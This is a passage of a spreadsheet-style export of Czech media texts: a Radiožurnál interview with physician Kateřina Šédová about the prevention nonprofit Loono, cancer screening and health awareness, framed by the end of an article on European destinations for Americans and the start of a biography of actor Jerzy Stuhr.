vítězství zamířit na Baleárské ostrovy ve Středomoří. Vláda španělského premiéra Pedra Sáncheze se totiž vzpírá trendu států Evropské unie zpřísnit přistěhovalectví. „Demokraté toužící po životě s vínem a revolucí a po tom, aby jejich daně přispěly ke štědřejšímu sociálnímu státu, by mohli skončit ve Francii ,“ nabízí Politico s tím, že luxus by zase mohli chtít hledat na jihu na Riviéře. V tomto případě ale portál varuje, že přímořská oblast je střediskem krajní pravice. Jasno má Politico také v tom, kam by se mohli uchýlit anarchističtí flamendři a zelení nadšenci. Pro ty první vidí jako ideál Amsterdam , pro ekology zase Brusel , kde šéfka Evropské komise Ursula von der Leyenová slibuje dekarbonizovat hospodářství. „Jen se musíte připravit každý rok na zhruba osm měsíců nepřetržitého deště,“ dodal o unijní metropoli server. Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20241101_95_3258433693_0a3d4590dc4f29cfe92d.html</t>
  </si>
  <si>
    <t>0a3d4590dc4f29cfe92d</t>
  </si>
  <si>
    <t>Dvacet minut Radiožurnálu</t>
  </si>
  <si>
    <t>Dvacet minut Radiožurnálu Vladimír KROC , moderátor: Jakou roli v českém zdravotnictví hraje prevence? Jak účinné jsou osvětové kampaně jako Růžový říjen nebo Movember a jak přivést lidi k větší odpovědnosti za vlastní zdraví? Hostem Dvaceti minut Radiožurnálu , které vysílá také ČRo Plus , je dnes lékařka Kateřina Šédová z interního oddělení Nemocnice na Bulovce . Zakladatelka organizace Loono, kterou v pondělí prezident republiky Petr Pavel vyznamenal medailí Za zásluhy prvního stupně. Zdravím vás do našeho přenosového vozu a gratuluji. Dobrý den. Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Dobrý den. Vladimír KROC , moderátor: Vzpomenete si, co bylo první, co vás napadlo, když jste byla spravena o úmyslu věnovat vám státní vyznamenání? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Upřímně, myslela jsem si, že je to v omyl, že si možná ze mě někdo jenom lehce vystřelil. Potom ale mi samozřejmě došlo, že to kancelář pana prezidenta myslí vážně, takže jsem se začala opravdu radovat. Vladimír KROC , moderátor: Co je organizace Loono? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Loono je neziskovka, která zvyšuje zdravotní gramotnost, šíří osvětu právě o zdravotní prevenci a zdravém životním stylu, zvyšuje návštěvnost preventivních prohlídek a snaží se bořit tabu, které je spojené stále ještě s vážnými onemocněními. Vladimír KROC , moderátor: Proč ta transkripce, dvě. O. Nekomplikuje vám to život, že přinejmenším napoprvé musíte vysvětlovat, jak se název vaší neziskovky píše? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Já jsem sama měla rakovinu vaječníků, takže tenkrát se loono mělo vázat primárně k ženskému zdraví. A ty dvě očka měla být měly být vaječníky právě v našem logu. Zároveň jsme ale hledali i slovo, které bude použitelné v zahraničí, protože už od začátku jsme věděli, že prevence není potřeba jen u v Česku, ale i v zahraničí, takže jsme si s tou hříčkou trošku nebo s tím slovem trošku pohráli a zůstalo nám to do dneška. Vladimír KROC , moderátor: Jak to celé před těmi 10 lety začalo v souvislosti právě s vaším onemocněním? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Ano, přesně tak. Já jsem ve čtvrtém ročníku na medicíně zjistila, že mám tedy nádor na vaječníku. Byla jsem tehdy aktivním sportovcem, mladým člověkem dosud zdravým, takže mě to samozřejmě velice zaskočilo, ale jako medik už jsem věděla, jak se mohou vážná onemocnění projevovat, takže jsem neváhala a navštívila lékaře velice brzo a bohužel jsem se teda vyslechla tuto nepříjemnou diagnózu. Když jsem o svém příběhu vyprávěla vlastně svým vrstevníkům, svým spolužákům i mimo medicínu, tak jsem zjistila, že většina z nich by na ty příznaky nereagovala, že by třeba nenavštívili lékaře včas, což mě vyděsilo. Takže jsem chtěla šířit osvětu nebo respektive alespoň jim vyprávět o tom, co by měli v tu chvíli dělat. Takže to začalo prvními osvětovými workshopy, osvětovou kampaní, příspěvky na sociální sítích a vyrostlo to až tam, kde je Loono dneska, tedy organizací, která čítá více než 100 lidí a ke které se připojily za ty roky několik stovek lékařů a studentů medicíny. Vladimír KROC , moderátor: Říkáte 100 lidí čili většinou jsou to medici a lékaři? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Většina z nich ano, určitě 80 z nich jsou právě zdravotníci. Máme ale v týmu i samozřejmě profesionály z oboru marketingu a projektového řízení, financí a dalších, aby opravdu ta organizace fungovala tak, jak má. Tak a lékaři se mohli soustředit na to, co jim jde nejlépe, a to je ta edukace veřejnosti a vlastně dávání dohromady těch lékařských podkladů. Ale o chod té organizace se starají i další profesionálové. Vladimír KROC , moderátor: Na internetu se najde leccos, spousta zavádějících, zavádějících informací. Jakým způsobem se snažíte odlišit, aby bylo jasné, že jsou to odborné informace, na které se lze spolehnout? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : My máme od samého začátku záštitu první lékařské fakulty Univerzity Karlovy, která je i v mojí alma mater. Spolupracujeme právě tedy s odborníky primárně z první lékařské, ale i z dalších lékařských fakult po celé ČR. Všechny informace opravdu šíříme tak, aby byly podle nejnovějších studií vlastně všechny evident space založené tedy na důkazech. Toto se snažíme komunikovat, ať už na webových stránkách nebo na sociálních sítích a zároveň i v těch našich podcastech, videích. A právě v těch příspěvcích se tito odborníci objevují. Takže já věřím, že veřejnost našemu názoru věří a pokud i třeba něco neví nebo má doplňující otázky, tak se nám neváhá napsat. Vladimír KROC , moderátor: Jak Lunu pomáhá ostatním lékařům? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : My dodáváme dnes brožury, různé edukační videa, letáčky do ordinací, protože lékař často nemají na osvětu, nebo edukaci v těch ordinacích čas. Já sama to zažívám jako lékařka na Bulovce , že to ne vždycky úplně je na to prostor, takže se jim to snažíme co nejvíce ulehčit. Zároveň lékaři dneska doporučí i naši mobilní aplikaci Preventivka právě s odkazem na samovyšetření prsu nebo na to, aby si v ní leží pacienti tedy hlídali své preventivní prohlídky. Takže se snažíme podpořit nejenom tu veřejnost, ale i lékaře. Vladimír KROC , moderátor: Proč jste se v roce 2020 to vzdala pozice exekutivní ředitelky? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Protože jsem věděla, že to někdo udělá lépe než já. Já jsem od začátku vlastně si v té organizaci vyzkoušela všechny možné role, což mi dalo skvělý základ do toho na ty role potom najít daleko lepší lidi než jsem já. Takže já se dneska primárně věnuji spíš fundraisingu a chodím třeba na rozhovory, dělám medicínskou záštitu, vlastně jsem k takovým odborným garantem z velké části a to provozní řízení přenechávám lidem, kteří jsou na to zkrátka lepší. Vladimír KROC , moderátor: Hostem Dvaceti minut Radiožurnálu je dnes lékařka Kateřina Šédová, zakladatelka organizace Loono . Jak těžké je vysvětlovat lidem srozumitelně někdy složité medicínské problémy? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Velice. Myslím si, že velice, ale to je něco, v čem my jsme právě dobří, což je naše nebo co je naše taková řekněme konkurenční výhoda, protože my víme už i z té práce z terénu, jak strašně zahlcující může být, když od lékaře slyšíte nedej bože nějakou diagnózu rakovina, ale i třeba to, že máte vysoký cholesterol nebo vysoký tlak. Vy tomu v tu chvíli nerozumíte. Máte řadu otázek nebo vás ty možná otázky napadnou, až když jdete domů. Takže my se snažíme v těchto chvílích tu veřejnost podpořit nějakým způsobem ta témata předchroustat a dát je třeba právě na náš blog nebo na webové stránky, aby až tu diagnózu obdrží, aby našli právě ty relevantní informace, vysvětlené laicky, srozumitelnou cestou, pozitivní a hlavně otevřenou, takovou, která nevytváří kolem nemocí, jako je třeba cukrovka nebo duševní choroby tabu, protože víme, že je s tím spojena celá řada právě stigmat ještě. Vladimír KROC , moderátor: A čím to je, že některá ta tabu, vy jste to řekla v úvodu, stále přetrvávají? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Myslím si, že to je pořád otázka výměny generací, že opravdu i generace mých rodičů a prarodičů nebyla zvyklá o zdraví mluvit tolik jako třeba právě dnešní mladí. Je tam spousta nebo dřív bylo hodně tabu téma rakovina, dneska už jsme to trošku prolomili. Dá se o tom trošku víc mluvit. Zároveň ale třeba v regionech Česka pořád, když má někdo rakovinu, tak se to tutlá. Novým tabu se stali samozřejmě duševní choroby, které po COVIDu vstoupily do popředí. A bohužel nám ještě nás ještě čeká dlouhá cesta v tom, abychom toto tabu prolomili, protože mám pocit, že je v některých ohledech daleko složitější než právě téma rakoviny. Vladimír KROC , moderátor: A mění se podle vás přístup lidí k prevenci? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Určitě se s trendem zdravého životního stylu a bohužel teda v tomto ohledu i vlivem sociálních sítí je velký tlak na to, být hezký, být krásný, být možná zdravý, hubený, což trošičku napomáhá, ale zároveň samozřejmě i velice škodí, ať už duševnímu zdraví nebo přispívá to k poruchám příjmu potravy, ale celkově vidíme, že i ve světě i v Česku ten trend zdravého životního stylu tady je a my máme z toho velkou radost, protože daleko více lidí cvičí, daleko více lidí se třeba dívá na to, co jí. I tak ale pořád čísla obezity, výskytu vysokého krevního tlaku, výskytu vysokého cholesterolu a celkově kardiovaskulárních onemocnění neklesají a možná právě ještě stran obezity a cukrovky rozhodně rostou. Vladimír KROC , moderátor: Na to jsem se chtěl ptát. Ačkoli vím, že vy nechcete strašit, jestli by mi statistikami, ale přesto ta vážná onemocnění u nás jsou spíš na vzestupu. Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Určitě ano. Bohužel tedy. A nemluvíme jenom o rakovině. Spíš já třeba z pohledu internisty vidím jako vážné onemocnění i třeba vysoký krevní tlak nebo právě vysoký cholesterol, které jsou nebezpečné zejména proto, že nebolí a že si zkrátka lidé myslí, že když je to nebolí, nějakým způsobem to necítí, tak třeba nemusí užívat ani ty léky, které jim předepíše lékař. A bohužel třeba i v těchto oblastech máme spoustu pacientů, kterým se ten stav horší, protože právě neužívají tu léčbu. Jinak incidence rakoviny určitě roste, ale na to mám, na to má velký podíl i to, že máme daleko lepší diagnostické metody a zachycujeme třeba nádory i v časnějším stádiu. Po COVIDu, jak asi víte, tak se zvýšil výskyt i duševních onemocnění, protože se jednak o tom začalo více mluvit, ale bohužel u řady pacientů se manifestovali už takovým měřítkem, že vyhledali právě pomoc odborníka. Vladimír KROC , moderátor: Obecně věnuje se Ministerstvo zdravotnictví o světě dostatečně? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Myslím si, že stále by se dalo něco zlepšit, ale právě k tomu ministerstvo přizvalo organizace, jako jsme my a další pacientské organizace, kterým poskytuje dotace. Ale myslím si, že skvělou práci dělá třeba Národní screeningové centrum, které se stará o to, aby se vyvíjely a spouštěly a monitorovaly a reportovaly screeningové programy, které v Česku za poslední roky přibyly. Jak asi víte, máme nový screeningových program na včasné odhalení rakoviny plic od letošního roku, máme i program včasného odhalení karcinomu prostaty a to dělá si celkem vlastně už k těm předchozím kolorektálního screeningu, mamografického screeningu a včasnému odhalení právě rakoviny děložního čípku opravdu jeden z nejlepších systémů v kontextu Evropy a světa. Vladimír KROC , moderátor: Čili tato plošná prevence funguje, zabírá, je účinná? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Určitě účinná je. Právě screeningové programy se vybírají nebo volí podle toho, jestli jsou ekonomicky přijatelné, jestli je to dostatečně častá nemoc, jestli máme právě dostatečně senzitivní metodu na to, abychom ji dokázali odhalit. Takže v těchto kritériích určitě ano. Myslím si, že co ale pokulhává je jejich návštěvnost, takže bychom se my jako občané měli trošku polepšit v tom, jak na ně chodíme, nebo nechodíme na ten kolorektální screening, tedy včasné odhalení rakoviny tlustého střeva, chodí v Česku nějakých 22 % lidí, kteří by na ní chodit měli. A to je z mého pohledu velice málo. Vladimír KROC , moderátor: Jak důležité je, aby se onemocnění zachytilo a správně diagnostikovat včas nebo co nejdříve? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Přesně tak. Je to asi ta nejdůležitější věc v tu chvíli, protože čím dříve se onemocnění odhalí, tím lépe se léčí. Samozřejmě jsou výjimky u velice agresivních typů, ať už rakoviny nebo třeba těch kardiovaskulárních nemocí. Obecně to ale platí, že prostě pokud něco zachytím dřív, může to lépe léčit. Toho člověka to méně bolí, méně zatěžuje časově, finančně, méně to ovlivní jeho rodinu. Takže to je něco, co se snažíme lidem dlouhodobě vysvětlovat, protože my samozřejmě poslouchám všechny ty argumenty, že se lidé bojí diagnózy, mají strach z toho, co se jim objeví na té preventivní prohlídce. Takže toto jsou ty nejčastější argumenty, které poskytujeme a zároveň říkáme, že pokud to onemocnění se zvládne, je pod kontrolou, tak s ním člověk může žít ještě mnoho, mnoho let, jako to vidíme třeba v kontextu právě cukrovky, astmatu nebo i třeba lidí, kteří přežili rakovinu a jsou tady s námi dalších 20, 30 let. Vladimír KROC , moderátor: Jak vám k šíření prevence pomáhají moderní technologie? Vy už jste se zmínila o mobilní aplikaci Preventivka. Jak funguje? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Mobilní aplikace Preventivka připomíná preventivní prohlídky na základě věku a pohlaví. Tedy když si tam tyto dva parametry zadáte, tak vám vyjede, kam máte a kdy chodit. A tyto projekty se vám pravidelně v těch intervalech připomínají, zároveň každý měsíc, co se vám připomene, i samovyšetření prsu, varlat a kůže, které je důležité právě v prevenci rakoviny. A nově od minulého měsíce si tam můžete zadávat a sledovat také očkování. Kromě toho aplikace sleduje i všechny další prohlídky u specialistů, které máte. To znamená, že když chodíte na plicní nebo onkologii atd., tak si tam všechny tyto prohlídky můžete dát a samozřejmě vám to bude připomínat i je. My kromě těchto prohlídek jsme do aplikace vložili i veškeré články, videa, podcasty, které Loono kdy vytvořilo. Takže je to takovou knihovnou o zdraví a prevenci. A v kontextu několika málo dní tam bude začínat i tzv. spánková výzva, ke které se mohou uživatelé zdarma přihlásit a která jim pomůže ve čtyřech týdnech skrze články a doporučení a videa nastavit a zlepšit spánek, který věříme, že právě v prevenci rakoviny, infarktu a dalších nemocí je jeden z nejzásadnějších. Vladimír KROC , moderátor: Máte hodně sledovatelů sociálních sítích? Ukazují se být tím nejefektivnějším kanálem šíření potřebných medicínských informací. Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Myslím si, že záleží, na kterou cílovou skupinu cílíme. Ale dneska už opravdu vidíme, že na sociální sítích nebo obecně v on-line prostředí je velká část naší populace a od COVIDu vlastně se ten náš zásah v on-line prostředí ještě daleko zvýšil. Takže opravdu my kromě workshopů ve školách, firmách a na různých kulturních akcích jsme hodně aktivní v tom on-line prostředí. Ročně se nám daří zasáhnout na 5 milionů lidí, ať už je třeba právě skrze sociální sítě, aplikaci nebo i ten video podcast, popřípadě různé rozhovory v médiích. Jsme dneska už přizýváni jako experti právě na prevenci. K různým setkáním, ať už i na vládních platformách nebo třeba do celonárodní televize, čehož si já obrovsky vážím, protože to opravdu zabralo nějakou dobu se do této pozice dostat. A je zatím i práce všech těch odborníků, které jsem zmiňovala na začátku, kteří naší misi věří a kteří svůj expertizu a volný čas věnují právě naší neziskovce. Vladimír KROC , moderátor: Doktorka Kateřina Šédová je naším hostem. Zastihli jsme vás na světovém kongresu interní medicíny? Jakým se věnuje tématům? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Asi největším tématem je tu letos obezita, která je už světovým, světovou pandemií řekněme, od COVIDu jsme se přesunuli opravdu k tomu, že vidíme, že obezita trápí celý svět. Takže to je jedno z hlavních témat, které tady zaznívá, stejně jako vysoký cholesterol, vysoký tlak. Vladimír KROC , moderátor: Skončil Růžový říjen, na který navazuje Movember. K tomu se váže prevenci rakoviny prsu, potažmo varlat. Stává se samovyšetření už samozřejmostí? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Já věřím, že trošku větší samozřejmostí, než byla. My se samozřejmě proto snažíme dělat cokoliv, co můžeme. Vladimír KROC , moderátor: A jak účinné jsou podobné kampaně podle vaší zkušenosti? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Jsou velice účinné, pokud se třeba dají do kontextu i nějakého příběhu. My třeba v kontextu Růžového října nebo i Movemberu používáme příběhy reálných lidí, kteří si díky samovyšetření nebo právě screeningu odhalili rakovinu včas. A to si myslím, že funguje. Na tom byl vlastně postavený i Movember, tedy světová kampaň. A na tom třeba vyrostla i ta naše kampaň. Růžový říjen nebo prsa koule. Když se ještě vrátíme na ten začátek a myslím si, že to je právě to, co funguje. Když vidíte příběh reálného člověka, který si tou rakovinou prošel, tak vás to daleko více motivuje. A už vůbec, když je to třeba někdo ve vašem blízkém okolí. Vladimír KROC , moderátor: Jaké je tedy desatero péče o prsa? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Desatero. A to bychom tady byli ještě další hodinku. Ale myslím si, že je to zdravý životní styl, samovyšetření, po 45. roce, jednou za dva roky mamografický screening, nekouření a udržení si zdravé váhy. Vladimír KROC , moderátor: A mám se ptát na prevenci rakoviny varlat, nebo taky řeknete, že to je nadlouho? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Ne, tam bych možná právě zmínila ten už zmiňovaný program screeningový a vyzvala tedy všechny muže 50 +, kteří ještě nebyli u svého praktického lékaře na změření markeru PSA, aby tak učinili, protože to je tou nejlepší prevencí právě rakoviny prostaty. Vladimír KROC , moderátor: Proč má očkování proti viru HPV smysl i u chlapců? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Protože i HPV může způsobovat rakovinu v oblasti análního otvoru nebo dutiny ústní, stejně tak u děvčat a u děvčat navíc může způsobit i rakovinu děložního čípku. Takže opravdu je důležité očkovat chlapce i dívky a je to hrazeno úplně ze zdravotního pojištění mezi 11. a 15. rokem věku. Vladimír KROC , moderátor: Jak se vám daří činnost Loona financovat? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : My jsme pro to, abychom vůbec uspěli, to v neziskovém sektoru, který je v Česku velice náročný ufinancovat, vytvořili multizdrojové financování, takže my dneska více než 50 % příjmů si vyděláme tím, že děláme workshopy pro firmy, děláme různé spolupráce a druhou polovinu máme od dárců, mecenášů, z dotací a grantů, ale opravdu bez té poloviny, kterou si ten provoz a na to fungování seženeme sami, bychom dneska existovat nemohly. Vladimír KROC , moderátor: Když jsme mluvili o screeningových programech, tak pokud vím, ty organizuje Ministerstvo zdravotnictví. Jaká je v tomto směru spolupráce? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : My obdržíme každý rok několik málo peněz právě z dotačních programů Ministerstva zdravotnictví . Snažíme se propojovat v těch edukačních kampaních. Často chodíme právě na různá setkání k podobě preventivních programů a jejich budoucnosti pro ČR. A zároveň jsme v současné době v jednání i o právě o propojení aplikace PreventiVka a EZkarty nebo aplikace Tečka, tak, abychom do ní přinesli ještě daleko víc prevence. Vladimír KROC , moderátor: Mluvila jste o workshopech. Jak navštěvované bývají veřejné debaty lektorů Loona? Ty jsou předpokládám bezplatné. Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Přesně tak. My, ať už je děláme ve školách, firmách nebo v těch kulturních centrech, tak opravdu ten zájem o ně veliký. My na ně bereme i různé edukační pomůcky, třeba modely prsou a varlat, ve kterých jsou ukryty bulky. Takže si každý může vyzkoušet, jak ta rakovina je vlastně cítit v tom těle. A to je něco, co si ten člověk nejlépe zapamatuje, u čeho se trošičku možná i zasměje, ale opravdu to na něm zanechá velký otisk. A máme už víc než 90 lidí, kteří se nám ozvali, že právě díky těm workshopům si odhalili potom bulku u sebe v prsu nebo ve varleti a byla jim tedy diagnostikovaná rakovina v časném stádiu. Vladimír KROC , moderátor: A ty označujete právě za ty, kterým jste možná zachránili život. Jak čtu na vašich stránkách? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Přesně tak. A nejsou to tedy jenom pacienti s rakovinou, ale i s různými vážnými kardiovaskulárními chorobami. A zároveň máme stovky a tisíce lidí, kteří nám dali jen tak vědět, že třeba díky nám zašli na preventivku, kde hrozně dlouho nebyli nebo že za přestali kouřit, začali se víc hýbat apod., což si myslím, že jim třeba může do budoucna výrazně ten život prodloužit nebo zkvalitnit. Takže i to je něco, co nás žene kupředu. Vladimír KROC , moderátor: Jak sledovaný je váš podcast? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Upřímně přizná, čísla teďka v hlavě nemám, ale zároveň vím, že každým rokem rostou. Podcast se věnuje zdraví, prevenci a inovacím v medicíně. Zrovna teďka jsme měli jedny z nejúspěšnějších epizod, byli třeba na téma neplodnost, poruchy erekce anebo třeba právě na duševní zdraví a syndrom vyhoření. Takže určitě doporučuji vyzkoušet právě i třeba proto, že je jeden z mála zdravotnických podcastů, který je v českém jazyce. Vladimír KROC , moderátor: Když jste znovu připomněla ty duševní choroby, jak odstranit nebo předcházet těm společenským stigmatům nebo mýtům. To, že je to něco, o čem vlastně by se neměl omluvit, za co bychom si možná mít mohli stydět? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : My se snažíme opět vysvětlit, že je to nemoc jako každá jiná. Já sama se na Bulovce s pacienty s duševními onemocněními setkávám poměrně často, ať už jsou to pacienti závislí, ať už na alkoholu , na nějakých omamných látkách nebo pacienti s depresemi, úzkostnými stavy. Snažíme se většinou, když třeba nějaké takové příznaky zpozorujeme, s pacientem tu komunikaci otevřít, říct mu, že to je nemoc jako každá jiná a že opět, když se to diagnostikuje nebo se za léčí v časném stádiu, může mu být daleko lépe. A stejně tak pokud se nám třeba svěří někdo, že má podezření, že se ta nemoc objevila u něj v rodině, tak se snažíme tu rodinu podpořit v tom, aby společně vyhledali tu pomoc, což ne vždycky může být snadné, ale říkám, děláme pro to, co můžeme. Vladimír KROC , moderátor: A mění se i to, jak přistupujeme k vlastnímu tělu? Teď nemyslím to, o čem jste už mluvila, že se snažíme třeba cvičit a hýbat se, ale že přestáváme spoléhat na to, že když se v těle něco porouchá, lékař to rychle a možná až zázračně opraví. Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Já myslím, že pořád na to hodně lidí spoléhá a z mojí vlastní opravdu lékařské praxe to vidím, že se mi lidi položí do rukou, a řeknou ať je vlastně spravím. Já se jim často snaží vysvětlit, že takto úplně nefunguje, že po infarktu je ta hlavní práce právě u třeba na straně toho pacienta. Takže bohužel tady nemůžu říct, že se to úplně mění, ale zároveň vidíme, že lidé jsou motivovaní třeba víc spolupracovat s praktickým lékařem, víc se ptát, víc se zajímat o to, co ještě můžou třeba užívat za doplňky stravy, jaké další krevní testy si můžou v prevenci udělat. Takže jsou tam světlé ostrůvky, ale ta většina té populace bohužel pořád spoléhá na to, že je ten systém opraví a ti bohužel potom způsobují i to, že ten systém je zahlcený. Vladimír KROC , moderátor: A v krátkosti už jenom, stimuluje systém zdravotnictví dost, abychom se o své tělo starali a snaží se tedy předcházet těm vážným problémům? Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Myslím si, že ano právě tím, že odrazuje lidi od těch dlouhých čekacích dob. Ale jak říkám, myslím si, že to bude chtít systémovou změnu a zdravotnictví právě k prevenci. Vladimír KROC , moderátor: Hostem Dvaceti minut Radiožurnálu , které vysílá také ČRo Plus , byla Kateřina Šédová, která pracuje na interním oddělení Fakultní nemocnice na Bulovce a je zakladatelkou neziskové organizace Loono a držitelkou medaile za zásluhy. Děkuji a na shledanou. Kateřina ŠÉDOVÁ, lékařka, zakladatelka organizace Loono : Děkuji, na shledanou.</t>
  </si>
  <si>
    <t>87200</t>
  </si>
  <si>
    <t>20241101_96_3264635786_a1900cdf6c041b66506d.html</t>
  </si>
  <si>
    <t>a1900cdf6c041b66506d</t>
  </si>
  <si>
    <t>Jerzy Stuhr: Buržoazní synek s rakouskými kořeny se proslavil jako Max Paradys ze Sexmise</t>
  </si>
  <si>
    <t>Jerzy Stuhr : Buržoazní synek s rakouskými kořeny se proslavil jako Max Paradys ze Sexmise Jerzy Stuhr je u nás známý především díky sci-fi komedii Sexmise. Na kontě má ale na šest desítek filmů všech možných žánrů. Prosadil se rovněž jako režisér a scénárista. V synovi má pokračovatele. Je považován za jednoho z nejvýraznějších a nejoblíbenějších polských herců. On se ale cítil spíše Středoevropanem a netajil se tím, že je mu blízký německý pojem Mitteleuropa. „Ačkoli nemluvím německy, když jsem překročil rakouské hranice, vždy jsem se cítil jako doma,“ řekl dokonce v jednom z rozhovorů. Vděčil za to kulturnímu prostředí, ze kterého vzešel. Narodil se dne 18. dubna 1947 v Krakově jako jediné dítě Tadeusze Stuhra a jeho manželky Marie, rozené Chorąży. Matka byla účetní v obecním maloobchodě a později v divadle v Bílsku - Bělé . Otec, prokurátor, pocházel z rodu spjatého po generace s Krakovem . Právě do tohoto polského města přišli krátce po svatbě v roce 1879 praprarodiče Jerzyho Stuhra z Dolního Rakouska : Anna Thill ze Schrattenbergu a Leopold Stuhr z Wildendürnbachu . Annina rodina vlastnila vinice proslulé bílým vínem , zatímco Leopold byl představitelem bohaté buržoazie. Po příjezdu do Krakova koupil nájemní dům na náměstí Podgórski a založil restauraci, později se stal také radním. Hercovým dědečkem byl Leopold Antoni Stuhr , který ohluchl následkem válečného zranění. Jerzy tak měl blíže k jeho staršímu bratrovi Oskarovi , právníkovi a aktivistovi Národní strany, kterého nazýval rovněž dědečkem. Hercův otec Tadeusz Stuhr pokračoval v rodinné tradici a byl také právníkem. Jerzy Stuhr v roce 2017 řekl: „Můj otec byl prokurátor. Na tom by nebylo nic zvláštního, ale skutečnost, že to byl prokurátor, který nepatřil k Polské sjednocené dělnické straně, už byla zvláštní znamení. A můj otec? Co si vybral? Svobodu. Nezávislost. Byl skutečně přesvědčen, že by jako státní zástupce neměl být vázán žádnými ideologickými nebo stranickými vlivy.“ Bohužel, jak herec dále dodal, za tento svůj postoj zaplatil vysokou cenu - byl vyloučen ze zajímavých případů, neměl šanci na kariérní rozvoj a zastavil se na úrovni náměstka okresního státního zástupce. Šikana za rodinný původ Když bylo Jerzymu šest let, přestěhoval se s rodiči do Katovic , pak do Polského Těšína , a nakonec se usadil v Bílsku - Bělé , kde vystudoval střední školu. Na studium neměl ty nejlepší vzpomínky. Svými spolužáky byl šikanován kvůli svému německy znějícímu příjmení. Během střední školy začal hrát a byl zapojen do školních divadelních klubů. Pracoval také jako uvaděč v místním divadle Banialuka. Do Krakova se vrátil, aby vystudoval polonistiku na Jagellonské univerzitě. Filologickou fakultu ukončil v roce 1970. Vysokoškolská studia završil o dva roky později absolvováním herectví na krakovské Vysoké divadelní škole . V roce 1971 debutoval na přední krakovské scéně Stary Teatr, pod režijním vedením Andrzeje Wajdy ztvárnil Verchovenského v Camusově dramatizaci Dostojevského románu Běsi. O rok později nastoupil v tomto divadle do stálého angažmá a už mu zůstal věrný natrvalo. Na počátku kariéry hrál složité dramatické role Na stříbrném plátně jej diváci poprvé mohli spatřit v roce 1971 v úspěšném dramatu Andrzeje Zulawského Třetí část noci. Tento film, který byl zároveň debutem i pro režiséra, patří mezi myšlenkově neobyčejně originální válečná dramata. Děj se odehrává v kulisách okupovaného Krakova . Ve zvláštním oddělení tu pěstují vši, které přenášejí tyfovou nákazu. Pracovníci je živí vlastní krví výměnou za zvýšené potravinové příděly a osobní doklady, které je chrání před uvězněním. Filmová kariéra Jerzyho Stuhra je ale především spjata se dvěma jinými polskými režiséry - Krysztofem Kieslowskim a Juliuszem Machulskim. Kieslowski patřil k nejvýznamnějším polským režisérům a Stuhr se s ním poprvé setkal během natáčení filmu Jizva. Stuhr si v tomto režisérově úplně prvním celovečerním filmu zahrál obratného kariéristu, jednoho z vedoucích pracovníků továrny. Se začínajícím filmařem si padli do noty a stali se z nich celoživotní přátelé. Herec se považoval za režisérova žáka a učil se od něj základům filmového řemesla. Kieslowski mu na oplátku dal příležitost v celé řadě významných snímků, které se řadí do linie tak zvaného morálního neklidu. Tím nejvýznamnějším je film Amatér z roku 1979. Stuhr v něm ztělesnil čerstvého otce, jenž si pořídil kameru, aby zachytil vývoj svého potomka. Filmování absolutně propadl a pohltilo jej natolik, až se mu vymklo z rukou. O rok později v dalším režisérově filmu Klid ztvárnil propuštěného vězně, který čelí novému podezření. V roce 1981 Kieslowski obsadil Stuhra i do jednoho z vrcholných děl morálního neklidu, psychologického dramatu Náhoda. Mladý herec se díky této spolupráci dostal do povědomí diváků a získal si i přízeň filmových kritiků. Vzhledem k tomu, že se jednalo o vážná dramata, určená náročným divákům, masové obliby tím ale nedosáhl. Emigrace se bál V roce 1980 odjel na čas do Itálie , hrál tady divadlo a vedl herecké kurzy. V Polsku mezitím proběhly významné a zároveň velmi neblahé společenské změny. Dne 13. prosince 1981 vyhlásil komunistický generál Wojciech Jaruzelski jménem Vojenské rady národní záchrany v Polsku válečný stav, aby zastavil rostoucí vliv opozičního hnutí Solidarita. Před Stuhra se postavila otázka: Zůstat, nebo se vrátit po ukončení angažmá zpět do totalitní země?. Rozhodl se pro druhou možnost. „Mám spoustu přátel, kteří odešli z Polska . Někteří k tomu byli donuceni v březnu 1968. Potkal jsem je v Londýně , v Paříži , ve Florencii . A viděl jsem emocionálně zničené lidi. Vraky, doslova. Ptali se, co se děje v Krakově , a říkali: ‚Pozdravujte kluky z Piwnice pod Baranami.‘ Polsko je přitahovalo jako magnet. Byla to pro mě velká lekce,“ vysvětloval herec důvody svého rozhodnutí. Věřil, že kdyby zůstal v zahraniční, byl by po čase neurotický stejně jako ti, které potkal. Jeho herecká pozice by navíc okamžitě klesla, stal by se jedním z mnoha profesionálů. I po čas svého pobytu v Itálii nezapomínal na polský film. Na počátku osmdesátých začal pracovat s režisérem Piotrem Szulkinem, který se orientoval na fantastická témata a obsadil Stuhra do hlavních rolí svých snímků Válka 